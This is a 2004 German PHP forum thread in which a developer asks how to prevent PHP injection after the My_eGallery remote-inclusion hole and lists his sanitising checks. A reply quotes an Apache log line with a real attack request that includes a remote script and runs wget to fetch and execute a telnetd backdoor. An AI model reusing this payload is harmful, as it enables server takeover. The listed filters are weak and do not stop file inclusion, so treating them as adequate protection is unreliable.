Injections vorbeugen
Posted: 2004-01-05 14:47
Bin eben erneut auf das Thema my_Egallery gestossen welches immernoch dazu
führt das jemand Source über eine PHP Injection ausführen kann auf einem
Server.
Meine Gedanken führten nun dazu, das ich mir mal meinen eigenen Source
angesehen habe, da ich auch diverse Variablen benutze, und
mir nun langsam Sorgen mache ob ich meinem eigenen Source
noch vertraue oder nicht.
Bin kein totaler Anfänger mehr in Sachen PHP, denke also ich kann
die gröbsten Fehler bereits ausschliessen die gemacht werden können
allerdings plagt mich noch eine gewisse Unsicherheit.
Habe auf die Variablen diverse Checks gemacht:
- ereg_replace von ' durch ´
- ereg_replace von ; durch :
- htmlspecialchars
- htmlentities
nun ist meine frage ob ich irgendwas grundlegendes vergessen habe
oder ob es noch andere möglichkeiten gibt, wie man solche injections
verhindern kann.
danke im voraus
führt das jemand Source über eine PHP Injection ausführen kann auf einem
Server.
Code: Select all
200.158.98.178 - - [24/Dec/2003:03:22:57 +0100] "GET /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=cd%20/tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;./telnetd HTTP/1.1" 200 3063
angesehen habe, da ich auch diverse Variablen benutze, und
mir nun langsam Sorgen mache ob ich meinem eigenen Source
noch vertraue oder nicht.
Bin kein totaler Anfänger mehr in Sachen PHP, denke also ich kann
die gröbsten Fehler bereits ausschliessen die gemacht werden können
allerdings plagt mich noch eine gewisse Unsicherheit.
Habe auf die Variablen diverse Checks gemacht:
- ereg_replace von ' durch ´
- ereg_replace von ; durch :
- htmlspecialchars
- htmlentities
nun ist meine frage ob ich irgendwas grundlegendes vergessen habe
oder ob es noch andere möglichkeiten gibt, wie man solche injections
verhindern kann.
danke im voraus